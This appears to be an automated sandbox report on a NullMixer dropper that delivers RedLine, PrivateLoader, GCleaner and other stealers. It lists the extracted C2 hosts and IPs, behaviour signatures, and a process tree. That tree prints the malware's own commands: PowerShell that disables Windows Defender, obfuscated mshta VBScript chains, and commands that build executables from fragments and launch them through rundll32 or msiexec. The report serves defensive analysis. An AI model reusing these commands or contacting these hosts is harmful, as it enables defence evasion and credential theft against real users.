Analysis

  • max time kernel
    13s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-11-2024 11:38

General

  • Target

    setup_installer.exe

  • Size

    4.2MB

  • MD5

    c93901703b1d556d494f7a31ffb04720

  • SHA1

    d14e2dc239ac85e6020f1fc4c035f7d2ea72d262

  • SHA256

    0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631

  • SHA512

    3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900

  • SSDEEP

    98304:xVCvLUBsg7YyMtiPheSGykvDinvGCy8JoyvdSaXD:xmLUCg77MMP/GyTdy2YaXD

Malware Config

Extracted

Family

privateloader

C2

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Extracted

Family

nullmixer

C2

http://gazrxlog.xyz/

Extracted

Family

redline

Botnet

media23

C2

91.121.67.60:23325

Attributes
  • auth_value

    e37d5065561884bb54c8ed1baa6de446

Extracted

Family

gcleaner

C2

gcl-gb.biz

45.9.20.13

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Fabookie family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • Nullmixer family
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Onlylogger family
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Privateloader family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • OnlyLogger payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5092
    • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4056
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4244
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4664
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1092
        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0663b341399ee.exe
          Sat0663b341399ee.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2008
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            PID:4820
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1820
              • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                09xU.EXE -pPtzyIkqLZoCarb5ew
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2700
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:4448
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1244
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:3876
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:744
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:3688
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2448
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:744
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:3836
                    • C:\Windows\SysWOW64\control.exe
                      control .\R6f7sE.I
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:4392
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                        11⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:4548
                        • C:\Windows\system32\RunDll32.exe
                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                          12⤵
                            PID:2920
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                              13⤵
                                PID:372
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                      8⤵
                      • Checks computer location settings
                      • System Location Discovery: System Language Discovery
                      PID:1756
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2088
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                          10⤵
                            PID:1980
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                            10⤵
                              PID:2680
                            • C:\Windows\SysWOW64\control.exe
                              control .\R6f7sE.I
                              10⤵
                                PID:3712
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                  11⤵
                                    PID:2284
                                    • C:\Windows\system32\RunDll32.exe
                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                      12⤵
                                        PID:1620
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                          13⤵
                                            PID:1992
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F -Im "Sat0663b341399ee.exe"
                                7⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4116
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:2044
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat062000ca9aa6.exe
                          Sat062000ca9aa6.exe
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:3836
                          • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat062000ca9aa6.exe
                            C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat062000ca9aa6.exe
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3468
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4332
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0647140c100d63.exe
                          Sat0647140c100d63.exe
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Checks SCSI registry key(s)
                          PID:4064
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 360
                            5⤵
                            • Program crash
                            PID:1332
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4536
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat060fd7e42d2.exe
                          Sat060fd7e42d2.exe
                          4⤵
                          • Executes dropped EXE
                          PID:4080
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4252
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat06f5ed0e3bb24.exe
                          Sat06f5ed0e3bb24.exe
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5028
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )
                            5⤵
                            • Checks computer location settings
                            • System Location Discovery: System Language Discovery
                            PID:4748
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:532
                              • C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
                                H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
                                7⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:1948
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )
                                  8⤵
                                  • Checks computer location settings
                                  • System Location Discovery: System Language Discovery
                                  PID:3208
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1480
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )
                                  8⤵
                                  • Checks computer location settings
                                  • System Location Discovery: System Language Discovery
                                  PID:2868
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3940
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo "
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4956
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1652
                                    • C:\Windows\SysWOW64\msiexec.exe
                                      msiexec.exe /y .\xHnBBPN.0kM
                                      10⤵
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:2596
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill -Im "Sat06f5ed0e3bb24.exe" /F
                                7⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1772
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4928
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0619212f22dd7.exe
                          Sat0619212f22dd7.exe
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4040
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:3208
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat06ebc37d1c94352.exe
                          Sat06ebc37d1c94352.exe
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4016
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4780
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0618d93ac2c5c.exe
                          Sat0618d93ac2c5c.exe
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:672
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:2728
                        • C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0675f75df01bdb.exe
                          Sat0675f75df01bdb.exe
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4828
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 852
                            5⤵
                            • Program crash
                            PID:3988
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 860
                            5⤵
                            • Program crash
                            PID:1216
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 948
                            5⤵
                            • Program crash
                            PID:456
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 916
                            5⤵
                            • Program crash
                            PID:4756
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 996
                            5⤵
                            • Program crash
                            PID:1984
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1004
                            5⤵
                            • Program crash
                            PID:4388
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 988
                            5⤵
                            • Program crash
                            PID:4820
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4E33EBA7\Sat0675f75df01bdb.exe" & exit
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:3128
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im "Sat0675f75df01bdb.exe" /f
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              PID:2192
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1052
                            5⤵
                            • Program crash
                            PID:2520
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 592
                        3⤵
                        • Program crash
                        PID:3260
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4056 -ip 4056
                    1⤵
                      PID:4148
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4064 -ip 4064
                      1⤵
                        PID:1276
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4828 -ip 4828
                        1⤵
                          PID:744
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4828 -ip 4828
                          1⤵
                            PID:3964
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4828 -ip 4828
                            1⤵
                              PID:3440
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4828 -ip 4828
                              1⤵
                                PID:2960
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4828 -ip 4828
                                1⤵
                                  PID:1212
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4828 -ip 4828
                                  1⤵
                                    PID:4692
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4828 -ip 4828
                                    1⤵
                                      PID:1568
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4828 -ip 4828
                                      1⤵
                                        PID:1628
                                      • C:\Windows\servicing\TrustedInstaller.exe
                                        C:\Windows\servicing\TrustedInstaller.exe
                                        1⤵
                                          PID:1244

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log

                                          Filesize

                                          700B

                                          MD5

                                          e5352797047ad2c91b83e933b24fbc4f

                                          SHA1

                                          9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

                                          SHA256

                                          b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

                                          SHA512

                                          dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                          MD5

                                          968cb9309758126772781b83adb8a28f

                                          SHA1

                                          8da30e71accf186b2ba11da1797cf67f8f78b47c

                                          SHA256

                                          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                          SHA512

                                          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          16KB

                                          MD5

                                          7c7258093dbf2d6aee5df8f822cb1333

                                          SHA1

                                          2eb87fd8f78849d78f7b73ab9728ea94f985a040

                                          SHA256

                                          6125b2b3019687554379350ba93e87ef230155ae2bc3cd134fe33cb3d444a9d1

                                          SHA512

                                          6b0a42c7f0436200ec6c9edc0227a09eab0c2a620503cbc70c4d0d0f8b5fce67b82af91acae5b558621f7e24c4b3e05baa2afa24e97e4868b6ef846fe7b909e2

                                        • C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

                                          Filesize

                                          474KB

                                          MD5

                                          4bf3493517977a637789c23464a58e06

                                          SHA1

                                          519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4

                                          SHA256

                                          ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831

                                          SHA512

                                          4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

                                        • C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4

                                          Filesize

                                          148KB

                                          MD5

                                          243a3d5a63c4d0f3a18a3d340f50ed8d

                                          SHA1

                                          4b5d7d91fdc7666d131ef4ed7524bdc1b024a009

                                          SHA256

                                          4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1

                                          SHA512

                                          64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1

                                        • C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

                                          Filesize

                                          126KB

                                          MD5

                                          6c83f0423cd52d999b9ad47b78ba0c6a

                                          SHA1

                                          1f32cbf5fdaca123d32012cbc8cb4165e1474a04

                                          SHA256

                                          4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae

                                          SHA512

